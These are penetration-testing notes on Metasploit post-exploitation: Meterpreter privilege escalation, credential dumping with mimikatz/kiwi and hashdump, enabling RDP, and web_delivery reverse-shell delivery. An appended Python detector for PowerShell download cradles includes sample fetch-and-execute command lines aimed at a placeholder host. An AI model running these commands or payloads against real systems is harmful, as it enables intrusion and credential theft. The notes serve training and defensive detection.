Metasploit

  • -j  run the module as a background job (e.g. run -j / exploit -j)
  • sessions -i 1  interact with session 1

Meterpreter

Upgrade a plain shell session to Meterpreter with post/multi/manage/shell_to_meterpreter. A Meterpreter session can:
  • execute commands
  • search for files
  • download and upload files

Metasploit after gaining foothold

  • A Meterpreter shell is open on the target. Run the local exploit suggester:
run post/multi/recon/local_exploit_suggester
  • Decide on an exploit and background the Meterpreter session.
  • Select the exploit:
use <path/to/exploit>
  • Fill in the options (such as SESSION) and run the exploit.

Privilege Escalation on Windows Using Metasploit

  • Find a process running with higher privileges and migrate into it, for example spoolsv.exe:
migrate -N spoolsv.exe
  • Once NT AUTHORITY\SYSTEM is gained, load the kiwi (mimikatz) extension and dump all credentials:
load kiwi
help
creds_all
  • Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

  • From a Meterpreter session:
run post/windows/gather/hashdump
load kiwi
lsa_dump_sam

Webdelivery

use exploit/multi/script/web_delivery
show targets
set LPORT <attacker port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
  • Copy the generated one-liner into PowerShell or cmd on the target.
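The one-liner web_delivery hands out is a PowerShell download cradle (fetch a script over HTTP and evaluate it in memory, usually with a hidden window and no profile, sometimes as an encoded command), or a regsvr32 scriptlet call for the module's other targets. The following is an added example, not part of the original notes or of Metasploit, showing how a defender would flag such command lines in process-creation telemetry; the sample command lines and the 192.0.2.10 host are constructed for the example.

```python
import base64
import re

# Indicator patterns for the web_delivery-style cradle (defender's view):
# fetch-and-evaluate, hidden window / no profile, encoded command,
# and the regsvr32 scriptlet form used by the module's other targets.
CRADLE = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
REGSVR = re.compile(r"regsvr32.*/i:https?://.*scrobj\.dll", re.I)


def expand_encoded(cmdline):
    """Append the plaintext of a -EncodedCommand argument (base64 of UTF-16LE)
    so the other patterns can see it; unchanged if absent or undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def indicators(cmdline):
    """Return the names of every indicator matched by one process command line."""
    text = expand_encoded(cmdline)
    checks = [("regsvr32_scriptlet_url", REGSVR), ("download_cradle", CRADLE),
              ("in_memory_exec", EXEC), ("hidden_or_noprofile", HIDDEN)]
    hits = [name for name, rx in checks if rx.search(text)]
    if ENCODED.search(cmdline):
        hits.append("encoded_command")
    return hits


def is_suspicious(cmdline):
    """A lone IEX or -nop is noisy: alert on a cradle plus at least one more
    indicator, or on the regsvr32 scriptlet form."""
    hits = indicators(cmdline)
    return "regsvr32_scriptlet_url" in hits or ("download_cradle" in hits and len(hits) >= 2)


# Constructed sample command lines (not real telemetry); 192.0.2.10 is a placeholder host.
_ENC = base64.b64encode(
    "IEX (new-object net.webclient).downloadstring('http://192.0.2.10:8080/x')".encode("utf-16le")
).decode()
SAMPLES = {
    "cradle": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/x'))",
    "encoded": "powershell.exe -nop -w hidden -enc " + _ENC,
    "regsvr32": "regsvr32 /s /n /u /i:http://192.0.2.10:8080/x.sct scrobj.dll",
    "benign": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, is_suspicious(cmd), indicators(cmd))
```

Feed it the CommandLine field of Sysmon Event ID 1 or Windows Security 4688 events; the regsvr32 form is flagged on its own because a scriptlet URL in /i: has no routine administrative use.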